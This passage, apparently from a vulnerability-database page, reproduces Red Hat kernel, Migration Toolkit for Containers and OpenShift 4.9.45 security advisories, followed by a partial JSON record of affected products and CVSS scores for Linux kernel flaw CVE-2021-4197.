ppc64le: bpftool-4.18.0-305.57.1.el8_4.ppc64le.rpm bpftool-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-core-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-cross-headers-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-debug-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-debug-core-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-debug-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-debug-devel-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-debug-modules-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-debug-modules-extra-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-devel-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-headers-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-modules-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-modules-extra-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-tools-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-tools-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-tools-libs-4.18.0-305.57.1.el8_4.ppc64le.rpm perf-4.18.0-305.57.1.el8_4.ppc64le.rpm perf-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm python3-perf-4.18.0-305.57.1.el8_4.ppc64le.rpm python3-perf-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm

s390x: bpftool-4.18.0-305.57.1.el8_4.s390x.rpm bpftool-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm kernel-4.18.0-305.57.1.el8_4.s390x.rpm kernel-core-4.18.0-305.57.1.el8_4.s390x.rpm kernel-cross-headers-4.18.0-305.57.1.el8_4.s390x.rpm kernel-debug-4.18.0-305.57.1.el8_4.s390x.rpm kernel-debug-core-4.18.0-305.57.1.el8_4.s390x.rpm kernel-debug-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm kernel-debug-devel-4.18.0-305.57.1.el8_4.s390x.rpm kernel-debug-modules-4.18.0-305.57.1.el8_4.s390x.rpm kernel-debug-modules-extra-4.18.0-305.57.1.el8_4.s390x.rpm kernel-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-305.57.1.el8_4.s390x.rpm kernel-devel-4.18.0-305.57.1.el8_4.s390x.rpm kernel-headers-4.18.0-305.57.1.el8_4.s390x.rpm kernel-modules-4.18.0-305.57.1.el8_4.s390x.rpm kernel-modules-extra-4.18.0-305.57.1.el8_4.s390x.rpm kernel-tools-4.18.0-305.57.1.el8_4.s390x.rpm kernel-tools-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm kernel-zfcpdump-4.18.0-305.57.1.el8_4.s390x.rpm kernel-zfcpdump-core-4.18.0-305.57.1.el8_4.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm kernel-zfcpdump-devel-4.18.0-305.57.1.el8_4.s390x.rpm kernel-zfcpdump-modules-4.18.0-305.57.1.el8_4.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-305.57.1.el8_4.s390x.rpm perf-4.18.0-305.57.1.el8_4.s390x.rpm perf-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm python3-perf-4.18.0-305.57.1.el8_4.s390x.rpm python3-perf-debuginfo-4.18.0-305.57.1.el8_4.s390x.rpm

x86_64: bpftool-4.18.0-305.57.1.el8_4.x86_64.rpm bpftool-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-core-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-cross-headers-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-debug-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-debug-core-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-debug-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-debug-devel-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-debug-modules-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-debug-modules-extra-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-devel-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-headers-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-modules-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-modules-extra-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-tools-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-tools-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-tools-libs-4.18.0-305.57.1.el8_4.x86_64.rpm perf-4.18.0-305.57.1.el8_4.x86_64.rpm perf-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm python3-perf-4.18.0-305.57.1.el8_4.x86_64.rpm python3-perf-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v. 8.4):

aarch64: bpftool-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-debug-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-tools-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-tools-libs-devel-4.18.0-305.57.1.el8_4.aarch64.rpm perf-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm python3-perf-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm

ppc64le: bpftool-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-debug-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-tools-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm kernel-tools-libs-devel-4.18.0-305.57.1.el8_4.ppc64le.rpm perf-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm python3-perf-debuginfo-4.18.0-305.57.1.el8_4.ppc64le.rpm

x86_64: bpftool-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-debug-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-tools-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm kernel-tools-libs-devel-4.18.0-305.57.1.el8_4.x86_64.rpm perf-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm python3-perf-debuginfo-4.18.0-305.57.1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYuFkSdzjgjWX9erEAQhDCxAAknsy8K3eg1J603gMndUGWfI/Fs5VzIaH lxGavTw8H57lXRWbQYqJoRKk42uHAH2iCicovyvowJ5SdfnChtAVbG1A1wjJLmJJ 0YDKoeMn3s1jjThivm5rWGQVdImqLw+CxVvb3Pywv6ZswTI5r4ZB4FEXW8GIR1w2 1FeHTcwUgNLzeBLdVem1T50lWERG0j0ZGUmv9mu4QMDeWXoSoPcHKWnsmLgDvQif dVky3UsFoCJ783WJOIctmY97kOffqIDvZdbPwajAyTByspumtcwt6N7wMU6VfI+u B6bRGQgLbElY6IniLUsV7MG8GbbffZvPFNN/n6LdnnFgEt1eDlo6LkZCyPaMbEfx 2dMxJtcAiXmydMs5QXvNJ3y2UR2fp/iHF8euAnSN3eKTLAxDQwo3c4KvNUKAfFcF OAjbyLTilLhiPHRARG4aEWCEUSmfzO3rulNhRcIEWtNIira3/QMFG9qUjNAMvzU1 M4tMSPkH35gx49p2a6arZceUGDXiRwvrP142GzpAgRWt/GrydjAsRiG4pJM2H5TW nB5q7OuwEvch8+o8gJril5uOpm6eI1lylv9wTXbwjpzQqL5k2JcgByRWx8wLqYXy wXsBm+JZL9ztSadqoVsFWSqC0yeRkuF185F4gI7+7azjpeQhHtJEix3bgqRhIzK4 07JERnC1IRg= =y1sh -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Summary:

The Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:

The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):

2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes 2038898 - [UI] ?Update Repository? option not getting disabled after adding the Replication Repository details to the MTC web console 2040693 - ?Replication repository? wizard has no validation for name length 2040695 - [MTC UI] ?Add Cluster? wizard stucks when the cluster name length is more than 63 characters 2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2048537 - Exposed route host to image registry? connecting successfully to invalid registry ?xyz.com? 2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak 2055658 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings 2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace 2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the ?Last State? field. 2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade 2061335 - [MTC UI] ?Update cluster? button is not getting disabled 2062266 - MTC UI does not display logs properly [OADP-BL] 2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster?s service account secret from backend 2074675 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x 2076593 - Velero pod log missing from UI drop down 2076599 - Velero pod log missing from downloaded logs folder [OADP-BL] 2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan 2079252 - [MTC] Rsync options logs not visible in log-reader pod 2082221 - Don't allow Storage class conversion migration if source cluster has only one storage class defined [UI] 2082225 - non-numeric user when launching stage pods [OADP-BL] 2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments 2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods 2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels 2089411 - [MTC] Log reader pod is missing velero and restic pod logs [OADP-BL] 2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts 2090317 - [MTC] mig-operator failed to create a DPA CR due to null values are passed instead of int [OADP-BL] 2096939 - Fix legacy operator.yml inconsistencies and errors 2100486 - [MTC UI] Target storage class field is not getting respected when clusters don't have replication repo configured. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.9.45. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2022:5878

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

Security Fix(es):

  • openshift: oauth-serving-cert configmap contains cluster certificate private key (CVE-2022-2403)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

You may download the oc tool and use it to inspect release image metadata as follows:

(For x86_64 architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.45-x86_64

The image digest is sha256:8ab373599e8a010dffb9c7ed45e01c00cb06a7857fe21de102d978be4738b2ec

(For s390x architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.45-s390x

The image digest is sha256:1dde8a7134081c82012a812e014daca4cba1095630e6d0c74b51da141d472984

(For ppc64le architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.45-ppc64le

The image digest is sha256:ec1fac628bec05eb6425c2ae9dcd3fca120cd1a8678155350bb4c65813cfc30e

All OpenShift Container Platform 4.9 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

  1. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

2009024 - Unable to complete cluster destruction, some ports are left over 2055494 - console operator should report Upgradeable False when SAN-less certs are used 2083554 - post 1.23 rebase: regression in service-load balancer reliability 2087021 - configure-ovs.sh fails, blocking new RHEL node from being scaled up on cluster without manual reboot 2088539 - Openshift route URLs starting with double slashes stopped working after update to 4.8.33 - curl version problems 2091806 - Cluster upgrade stuck due to "resource deletions in progress" 2095320 - [4.9] Bootimage bump tracker 2097157 - [4.9z] During ovnkube-node restart all host conntrack entries are flushed, leading to traffic disruption 2100786 - [OCP 4.9] Ironic cannot match "wwn" rootDeviceHint for a multipath device 2101664 - disabling ipv6 router advertisements using "all" does not disable it on secondary interfaces 2101959 - CVE-2022-2403 openshift: oauth-serving-cert configmap contains cluster certificate private key 2103982 - [4.9] AWS EBS CSI driver stuck removing EBS volumes - GetDeviceMountRefs check failed 2105277 - NetworkPolicies: ovnkube-master pods crashing due to panic: "invalid memory address or nil pointer dereference" 2105453 - Node reboot causes duplicate persistent volumes 2105654 - egressIP panics with nil pointer dereference 2105663 - APIRequestCount does not identify some APIs removed in 4.9 2106655 - Kubelet slowly leaking memory and pods eventually unable to start 2108538 - [4.9.z backport] br-ex not created due to default bond interface having a different mac address than expected 2108619 - ClusterVersion history pruner does not always retain initial completed update entry

5

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202201-0496",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.15.14"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.276"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.5"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.238"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.189"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.111"
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "communications cloud native core binding support function",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "22.2.0"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "communications cloud native core binding support function",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "22.1.3"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "communications cloud native core binding support function",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "22.1.1"
      },
      {
        "model": "h300s",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410s",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700s",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410c",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h500s",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "oracle communications cloud native core binding support function",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30aa\u30e9\u30af\u30eb",
        "version": null
      },
      {
        "model": "brocade fabric os",
        "scope": null,
        "trust": 0.8,
        "vendor": "broadcom",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-019487"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-4197"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.189",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.238",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.276",
                "versionStartIncluding": "4.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.111",
                "versionStartIncluding": "5.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.15.14",
                "versionStartIncluding": "5.11",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_cloud_native_core_binding_support_function:22.1.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_cloud_native_core_binding_support_function:22.1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_cloud_native_core_binding_support_function:22.2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:brocade_fabric_operating_system_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-4197"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "167602"
      },
      {
        "db": "PACKETSTORM",
        "id": "167852"
      },
      {
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "db": "PACKETSTORM",
        "id": "168019"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2021-4197",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2021-4197",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-410862",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2021-4197",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-4197",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-410862",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
